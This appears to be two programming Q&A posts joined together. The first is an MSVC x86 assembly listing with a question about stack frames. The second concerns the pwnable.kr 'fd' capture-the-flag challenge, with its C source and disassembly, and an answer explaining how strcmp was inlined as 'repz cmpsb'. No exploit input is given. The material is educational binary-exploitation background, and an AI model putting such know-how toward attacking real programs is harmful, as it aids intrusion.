_ui$ = 8 ; size = 4
_i$ = 12 ; size = 4
_s$ = 16 ; size = 2
_us$ = 20 ; size = 2
_c$ = 24 ; size = 1
_uc$ = 28 ; size = 1
_l$ = 32 ; size = 4
_ul$ = 36 ; size = 4
_x$ = 40 ; size = 4
_y$ = 44 ; size = 2
_test PROC
; 59 : {
00000 55 push ebp
00001 8b ec mov ebp, esp
00003 83 ec 08 sub esp, 8
; 60 : char c1;
; 61 : int i1;
; 62 : char c2;
; 63 :
; 64 : ui = 1;
00006 c7 45 08 01 00
00 00 mov DWORD PTR _ui$[ebp], 1
; 65 : i = 2;
0000d c7 45 0c 02 00
00 00 mov DWORD PTR _i$[ebp], 2
; 66 : s = 3;
00014 b8 03 00 00 00 mov eax, 3
00019 66 89 45 10 mov WORD PTR _s$[ebp], ax
; 67 : us = 4;
0001d b9 04 00 00 00 mov ecx, 4
00022 66 89 4d 14 mov WORD PTR _us$[ebp], cx
; 68 : c = 5;
00026 c6 45 18 05 mov BYTE PTR _c$[ebp], 5
; 69 : uc = 6;
0002a c6 45 1c 06 mov BYTE PTR _uc$[ebp], 6
; 70 : l = 7;
0002e c7 45 20 07 00
00 00 mov DWORD PTR _l$[ebp], 7
; 71 : ul = 8;
00035 c7 45 24 08 00
00 00 mov DWORD PTR _ul$[ebp], 8
; 72 : x = 9;
0003c c7 45 28 09 00
00 00 mov DWORD PTR _x$[ebp], 9
; 73 : y = 10;
00043 ba 0a 00 00 00 mov edx, 10 ; 0000000aH
00048 66 89 55 2c mov WORD PTR _y$[ebp], dx
; 74 : c1 = 11;
0004c c6 45 ff 0b mov BYTE PTR _c1$[ebp], 11 ; 0000000bH
; 75 : c2 = 12;
00050 c6 45 fe 0c mov BYTE PTR _c2$[ebp], 12 ; 0000000cH
; 76 : i1 = 13;
00054 c7 45 f8 0d 00
00 00 mov DWORD PTR _i1$[ebp], 13 ; 0000000dH
; 77 : return ui * 2 + l;
0005b 8b 45 08 mov eax, DWORD PTR _ui$[ebp]
0005e 8b 4d 20 mov ecx, DWORD PTR _l$[ebp]
00061 8d 04 41 lea eax, DWORD PTR [ecx+eax*2]
; 78 : }
00064 8b e5 mov esp, ebp
00066 5d pop ebp
00067 c3 ret 0
_test ENDP
_TEXT ENDS
; Function compile flags: /Odtp
; File c:\learningtree\348lm\courseprograms\348l\chap1\var.c
_TEXT SEGMENT
_l$ = -24 ; size = 4
_ui$ = -20 ; size = 4
_ul$ = -16 ; size = 4
_s$ = -12 ; size = 2
_us$ = -8 ; size = 2
_uc$ = -2 ; size = 1
_c$ = -1 ; size = 1
_argc$ = 8 ; size = 4
_argv$ = 12 ; size = 4
_envp$ = 16 ; size = 4
_main PROC
; 28 : {
00000 55 push ebp
00001 8b ec mov ebp, esp
00003 83 ec 18 sub esp, 24 ; 00000018H
; 29 : unsigned char uc;
; 30 : static short y = 99;
; 31 : short s;
; 32 : char c;
; 33 : unsigned short us;
; 34 : static int i;
; 35 : unsigned int ui;
; 36 : long l;
; 37 : unsigned long ul;
; 38 :
; 39 : if (i < 4) {
00006 83 3d 00 00 00
00 04 cmp DWORD PTR ?i#?1??main##9#9, 4
0000d 7d 15 jge SHORT $LN4#main
; 40 : ui = us + s - c;
0000f 0f b7 45 f8 movzx eax, WORD PTR _us$[ebp]
00013 0f bf 4d f4 movsx ecx, WORD PTR _s$[ebp]
00017 03 c1 add eax, ecx
00019 0f be 55 ff movsx edx, BYTE PTR _c$[ebp]
0001d 2b c2 sub eax, edx
0001f 89 45 ec mov DWORD PTR _ui$[ebp], eax
; 41 : }
00022 eb 12 jmp SHORT $LN2#main
$LN4#main:
; 42 : else {
; 43 : ul = si - sj * 2;
00024 a1 00 00 00 00 mov eax, DWORD PTR _sj
00029 d1 e0 shl eax, 1
0002b 8b 0d 00 00 00
00 mov ecx, DWORD PTR _si
00031 2b c8 sub ecx, eax
00033 89 4d f0 mov DWORD PTR _ul$[ebp], ecx
$LN2#main:
; 44 : }
; 45 :
; 46 : while (sj > c) {
00036 0f be 55 ff movsx edx, BYTE PTR _c$[ebp]
0003a 39 15 00 00 00
00 cmp DWORD PTR _sj, edx
00040 7e 1e jle SHORT $LN3#main
; 47 : uc = y - 3;
00042 0f bf 05 00 00
00 00 movsx eax, WORD PTR ?y#?1??main##9#9
00049 83 e8 03 sub eax, 3
0004c 88 45 fe mov BYTE PTR _uc$[ebp], al
; 48 : sj++;
0004f 8b 0d 00 00 00
00 mov ecx, DWORD PTR _sj
00055 83 c1 01 add ecx, 1
00058 89 0d 00 00 00
00 mov DWORD PTR _sj, ecx
; 49 : }
0005e eb d6 jmp SHORT $LN2#main
$LN3#main:
; 50 :
; 51 : ret = test(ui, i, s, us, c, uc, l, ul, x, y);
00060 0f bf 15 00 00
00 00 movsx edx, WORD PTR ?y#?1??main##9#9
00067 52 push edx
00068 a1 00 00 00 00 mov eax, DWORD PTR _x
0006d 50 push eax
0006e 8b 4d f0 mov ecx, DWORD PTR _ul$[ebp]
00071 51 push ecx
00072 8b 55 e8 mov edx, DWORD PTR _l$[ebp]
00075 52 push edx
00076 0f b6 45 fe movzx eax, BYTE PTR _uc$[ebp]
0007a 50 push eax
0007b 0f be 4d ff movsx ecx, BYTE PTR _c$[ebp]
0007f 51 push ecx
00080 0f b7 55 f8 movzx edx, WORD PTR _us$[ebp]
00084 52 push edx
00085 0f bf 45 f4 movsx eax, WORD PTR _s$[ebp]
00089 50 push eax
0008a 8b 0d 00 00 00
00 mov ecx, DWORD PTR ?i#?1??main##9#9
00090 51 push ecx
00091 8b 55 ec mov edx, DWORD PTR _ui$[ebp]
00094 52 push edx
00095 e8 00 00 00 00 call _test
0009a 83 c4 28 add esp, 40 ; 00000028H
0009d a2 00 00 00 00 mov BYTE PTR _ret, al
; 52 :
; 53 : return 0;
000a2 33 c0 xor eax, eax
; 54 : }
000a4 8b e5 mov esp, ebp
000a6 5d pop ebp
000a7 c3 ret 0
_main ENDP
_TEXT ENDS
END
I understand the allocation of the variables, and how to determine if they belong in data, bss, or text. But I cannot understand how to tell when a frame starts or stops, the order, etc.
I'm lost on:
The order in the assembly code
How to know when a frame begins and ends.
In order to improve my binary exploitation skills, and deepen my understanding in low level environments I tried solving challenges in pwnable.kr, The first challenge- called fd has the following C code:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char buf[32];
int main(int argc, char* argv[], char* envp[]){
if(argc<2){
printf("pass argv[1] a number\n");
return 0;
}
int fd = atoi( argv[1] ) - 0x1234;
int len = 0;
len = read(fd, buf, 32);
if(!strcmp("LETMEWIN\n", buf)){
printf("good job :)\n");
system("/bin/cat flag");
exit(0);
}
printf("learn about Linux file IO\n");
return 0;
}
I used objdump -S -g ./fd in order to disassemble it, and I got confused, because insteaad of calling a strcmp function. It just compared the strings without calling it.
This is the assembly code im talking about:
80484c6: e8 05 ff ff ff call 80483d0 <atoi#plt>
80484cb: 2d 34 12 00 00 sub eax,0x1234
; eax = atoi( argv[1] ) - 0x1234;
; initialize fd=eax
80484d0: 89 44 24 18 mov DWORD PTR [esp+0x18],eax
; initialize len
80484d4: c7 44 24 1c 00 00 00 mov DWORD PTR [esp+0x1c],0x0
; Set up read variables
80484db: 00
80484dc: c7 44 24 08 20 00 00 mov DWORD PTR [esp+0x8],0x20 ; read 32 bytes
80484e3: 00
80484e4: c7 44 24 04 60 a0 04 mov DWORD PTR [esp+0x4],0x804a060 ; buf variable address
80484eb: 08
80484ec: 8b 44 24 18 mov eax,DWORD PTR [esp+0x18]
80484f0: 89 04 24 mov DWORD PTR [esp],eax ; fd variable
80484f3: e8 78 fe ff ff call 8048370 <read#plt>
80484f8: 89 44 24 1c mov DWORD PTR [esp+0x1c],eax
80484fc: ba 46 86 04 08 mov edx,0x8048646 ; "LETMEWIN\n" address
8048501: b8 60 a0 04 08 mov eax,0x804a060 ; buf address
8048506: b9 0a 00 00 00 mov ecx,0xa ; what is this?
; strcmp starts here?
804850b: 89 d6 mov esi,edx
804850d: 89 c7 mov edi,eax
804850f: f3 a6 repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi] ; <------- ?STRCMP?
The things I don't understand are:
Where is the strcmp call? And why is it like that?
What does this 8048506: b9 0a 00 00 00 mov ecx,0xa do?
The compiler inlined strcmp against a known-length string using repe cmpsb which implements memcmp.
It loads into register esi the address of the constant literal string "LETMEWIN\n". Note that the length of this string is 10 (with the '\0' at the end).
Then it loads the address of buf into edi register, then it calls for the x86 instruction:
repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi]
repz repeats the following instruction as long as zero flag is set and up to the number of times stored in ecx (this explains you the mov ecx,0xa ; what is this?).
The repeated instruction is cmps which compares strings (byte by byte) and automatically increases the pointers by 1 on each iteration.
When the compared bytes are equal, it sets the zero flag.
So per your questions:
Where is the strcmp call? And why is it like that?
No explicit call for strcmp, it is optimized out and replaced with inlined code:
80484fc: ba 46 86 04 08 mov edx,0x8048646 ; "LETMEWIN\n" address
8048501: b8 60 a0 04 08 mov eax,0x804a060 ; buf address
8048506: b9 0a 00 00 00 mov ecx,0xa ; number of bytes to compare
804850b: 89 d6 mov esi,edx
804850d: 89 c7 mov edi,eax
804850f: f3 a6 repz cmps BYTE PTR ds:[esi],BYTE PTR es:[edi] ;
Actually it misses the part where it should check if the returned value of strcmp is zero or not. I think you just didn't copy it here. There probably should be something like je ... / jz ... / jne ... / jnz ... right after the repz ... line.
What does this 8048506: b9 0a 00 00 00 mov ecx,0xa do?
It sets the maximum number of bytes to compare.